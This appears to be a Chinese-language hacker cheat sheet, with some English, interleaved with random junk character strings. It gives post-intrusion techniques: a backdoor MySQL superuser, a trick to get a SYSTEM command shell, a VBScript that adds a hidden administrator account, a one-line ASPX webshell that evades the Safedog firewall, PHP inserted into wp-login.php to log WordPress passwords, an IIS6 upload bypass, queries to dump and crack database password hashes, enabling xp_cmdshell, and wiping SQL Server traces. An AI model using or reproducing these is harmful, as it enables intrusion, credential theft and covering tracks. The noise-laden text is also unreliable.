' |! L# p' V5 \$ x! gCreate USER 'itpro'@'%' IDENTIFIED BY '123'; * J9 c0 s: r1 X4 A; i2 U/ i& ]0 K ~& v) ~: b* F+ {: Y6 G
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION5 _$ e9 }* I9 ?. y
4 g4 K& y3 p+ \; Q2 A
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 4 \4 M; x$ B: ^) G5 |0 m3 c B! q3 T% r
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;5 c1 E+ Q1 w9 ~4 G- _2 D! x0 @
% _. r. a3 t! R, I# j |$ l搞完事记得删除脚印哟。 0 K1 [, \/ r' P2 U) ?( t3 |7 z4 i* d3 K
Drop USER 'itpro'@'%'; * h1 F! i6 H9 G9 Z# A) X1 {# H. h7 o# t& b
Drop DATABASE IF EXISTS `itpro` ;+ U% n; I5 E8 h0 u
- ]$ n. {" d: d' N- w当前用户获取system权限 : T9 o4 [ Y" y7 l% q0 v. q# Bsc Create SuperCMD binPath= "cmd /K start" type= own type= interact ! z( g7 }1 Z, p5 O# _9 `8 K! L/ isc start SuperCMD $ ]' e) ^% q( o* W6 x& O程序代码 3 `: x( [2 C, n/ Q4 b<SCRIPT LANGUAGE="VBScript">0 X7 T7 i# b+ n+ A
set wsnetwork=CreateObject("WSCRIPT.NETWORK") & z* ?( q# i& F$ N! D: nos="WinNT://"&wsnetwork.ComputerName7 r, S7 u, i8 O
Set ob=GetObject(os) - v# u y5 q, ^! ?; s5 M) uSet oe=GetObject(os&"/Administrators,group") $ {& i# z9 O# u- n) c6 m4 ISet od=ob.Create("user","nosec") : i9 [. f: V$ H5 z6 rod.SetPassword "123456abc!@#" J- g" }% G; G ~% E0 Q$ S x
od.SetInfo ' w, P1 T6 ]' ESet of=GetObject(os&"/nosec",user) % d2 t7 n8 C: \& g: _% M) I" koe.add os&"/nosec" 6 ~* N8 |4 z, t; K. Y. j- y" i</Script>1 `" s5 R: @% w, @& Y1 X
<script language=javascript>window.close();</script>* S, S3 h4 S$ P3 g, G& X; w
$ k0 E1 n+ u+ l( C+ N/ d突破安全狗的一句话aspx后门 0 M0 F3 X+ O+ v8 B<%@ Page Language="C#" ValidateRequest="false" %> , L/ h x( w% A4 C; U- y<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%> 3 v: K$ R9 O, t& owebshell下记录WordPress登陆密码 K+ u; ]' V B, L- D: Bwebshell下记录Wordpress登陆密码方便进一步社工* d" T& A% q' U
在文件wp-login.php中539行处添加:& Q7 W, }6 J# A, I" [
// log password / V' U6 q* t, z9 ?: X$log_user=$_POST['log'];3 ]8 }( C; V; G* M( z3 w6 n* b: }
$log_pwd=$_POST['pwd']; - E; w3 R; Z1 z0 _9 Y( o m$log_ip=$_SERVER["REMOTE_ADDR"]; - `1 w7 K: W6 _ a5 s4 N- g* y$txt=$log_user.’|’.$log_pwd.’|’.$log_ip; 2 H% ?% q" I* x& H$txt=$txt.”\r\n”; ( Z% l8 h- x( Z4 U8 u) @1 rif($log_user&&$log_pwd&&$log_ip){ : {: |4 u7 m3 n6 s/ {2 T0 @- D' \@fwrite(fopen(‘pwd.txt’,”a+”),$txt); . a& b% L" h4 `8 [6 }- {; v l}2 M1 L! F* K1 X) ]! C
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。 " G' ^' }8 d/ n# j9 {8 ]4 `0 c就是搜索case ‘login’5 ~! k( \- U4 k O6 E
在它下面直接插入即可,记录的密码生成在pwd.txt中,9 F' [$ C$ d, \4 n1 `
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录 # G4 J! b, z2 E# _( X利用II6文件解析漏洞绕过安全狗代码: 4 Z5 B2 o1 r6 v7 v& q;antian365.asp;antian365.jpg& }: ?, y8 i( ^! y1 a' u
: e6 s$ u$ h" Q* j% y8 e
各种类型数据库抓HASH破解最高权限密码! ' W2 N# | f6 } ^* `8 _1.sql server2000 2 [* ]' b- q6 _3 {SELECT password from master.dbo.sysxlogins where name='sa', t3 ]6 d) S W7 s! @
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341 4 {% A! H( c9 G0 P% i2FD54D6119FFF04129A1D72E7C3194F7284A7F3A ( \/ a* M( x6 A, h' l# Y& L# \ 7 ? V$ R; m4 N$ K- M0×0100- constant header ! B$ i% }/ b- a34767D5C- salt6 F q5 Y% }* V8 F6 w
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash' E, r% U$ u4 e3 q2 y1 o! b/ ~
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash9 Z# h r- D5 _! c( c/ L7 T L2 a
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash& F$ L2 x2 ]6 P% D, o5 D* Z
SQL server 2005:-1 a o3 E+ n& O% }' J
SELECT password_hash FROM sys.sql_logins where name='sa') y! `5 u4 F. p6 q
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F/ L! `/ X# R) Y; l# L
0×0100- constant header : G+ \7 d. ]0 H Z) M2 S7 F993BF231-salt / y$ }* t+ | w w4 e5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash( [5 ]! u5 I7 s" Q
crack case sensitive hash in cain, try brute force and dictionary based attacks.: x- H& T# E5 Z5 Z- Y0 Y' V
* d% h3 D, Z2 G3 r9 ]/ o0 t2 v1 I# tupdate:- following bernardo’s comments:-/ @7 O p7 P9 D& _- [: M
use function fn_varbintohexstr() to cast password in a hex string. 1 h8 `0 _6 i1 Ae.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins ) h0 d+ e/ @* Y3 _) e' J" F3 N B- ?8 z* Y$ c" L. G# G3 I9 ~MYSQL:-% T3 p% J5 d- n
* H r+ @* Y5 S2 u/ X6 q/ p7 J: ZIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2. % j$ r* h) s' q6 L# ^. y% X& v0 J$ { P: S; L
*mysql < 4.1 - T% H# Z/ B0 I; Y # x, J4 T2 _7 }# Omysql> SELECT PASSWORD(‘mypass’);4 o2 l3 l: v. c: O
+——————–+ ; U2 R" j& d- C3 q4 m8 W" a9 @: j| PASSWORD(‘mypass’) |* ~" h0 {$ s5 r3 T) ?
+——————–+ , A- }7 [* _! z| 6f8c114b58f2ce9e | + O% v8 A- Z3 U5 {4 T9 B+——————–+: P# q u* K5 T2 R) }4 I
. q4 n) |2 m) o! z" h*mysql >=4.1' X6 j; a, _1 N9 x# R- m3 d
\$ |" g8 V5 t: Z% z
mysql> SELECT PASSWORD(‘mypass’);! [2 H& N% S. U s1 h* J+ `/ h
+——————————————-+. i `. Z: { O5 v* r8 q$ t! h
| PASSWORD(‘mypass’) |5 P3 F& s3 b) ^# @- F; A! H
+——————————————-+" e" x4 {7 Z+ a7 z9 i9 C- R
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 | + ~ S2 [. ]9 T3 |, x. Q8 ^+——————————————-+ 8 {/ I. C0 ^! F6 N) K) ^. O1 c3 U2 x
Select user, password from mysql.user 7 |/ O2 _- F4 P8 S1 I: P2 pThe hashes can be cracked in ‘cain and abel’6 T& v" V3 C+ K( E6 c5 H
& L! h: R1 l; ~ d& z3 E" uPostgres:-+ n8 N f5 v5 f1 E( v, D. n
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”) # W, K" q: a$ N9 Fselect usename, passwd from pg_shadow; 7 l# ~3 L* {: `usename | passwd9 {& {. e! `1 G, d
——————+————————————- 7 H/ C8 v: s5 K( x" I. l# l) T* Dtestuser | md5fabb6d7172aadfda4753bf0507ed4396 + n7 c- Z3 u+ b6 o: R/ d6 }use mdcrack to crack these hashes:- 2 L, ?; a! h+ V1 ?! V0 {: d% H) S$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396 1 I$ F4 g6 D C; O+ X( J3 m& ] # l2 y/ @/ s B# V. T* mOracle:-4 s" r0 L N' u/ [& L5 n" d, r
select name, password, spare4 from sys.user$ $ C4 u0 S, B2 ^' d7 J0 U( ~$ F3 shashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g) C8 e' C/ P$ }. ~7 t- }
More on Oracle later, i am a bit bored…. + [; E; V' Z( h" ^7 R9 J& q ( S1 R3 J+ b. s7 Q* g$ T! E% k9 F; o7 U9 B4 `' e3 E6 d8 b% ~
在sql server2005/2008中开启xp_cmdshell & x; s( r* d e b) z-- To allow advanced options to be changed.7 A3 c. q; x: `' |* U
EXEC sp_configure 'show advanced options', 1 & a+ {; I' O6 W3 j' H4 W; s5 I! P% CGO/ S3 s* z' O+ u' s. I* e" Z
-- To update the currently configured value for advanced options.6 M' W) j( b2 E4 O3 B: v
RECONFIGURE0 A: M& m% i' \0 Z8 \' M! s3 ^
GO 1 j; ]8 a0 C) _& q9 h1 S7 h-- To enable the feature.# b! T8 v n9 c0 s7 b3 c9 u
EXEC sp_configure 'xp_cmdshell', 1 4 E( C, w9 E* ^' k$ l& V' PGO 4 q8 a2 z6 g( r8 M/ K0 e' n- L; ^-- To update the currently configured value for this feature.; h' \9 _2 t$ @1 Y, H- O
RECONFIGURE # d* ~" t# {8 g9 R5 ^! D7 mGO # X5 s8 \6 M$ n8 v/ G3 A. iSQL 2008 server日志清除,在清楚前一定要备份。1 u8 k8 Y! J8 D. }- N
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:6 J8 I* Z: y% q8 {, Q1 @& @
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin 1 {: W1 ~6 D. ^4 t 5 b7 r8 ?7 u3 p+ m2 e$ c对于SQL Server 2008以前的版本:2 X" t" @* ~% {! T# V
SQL Server 2005:+ I' B" z1 S: D( ]& ~
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat 2 t) I) H- h$ N: ~; c9 SSQL Server 2000: ' B, g, o, H' E z L清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。# e, p0 w0 Z8 ~- [. Z" b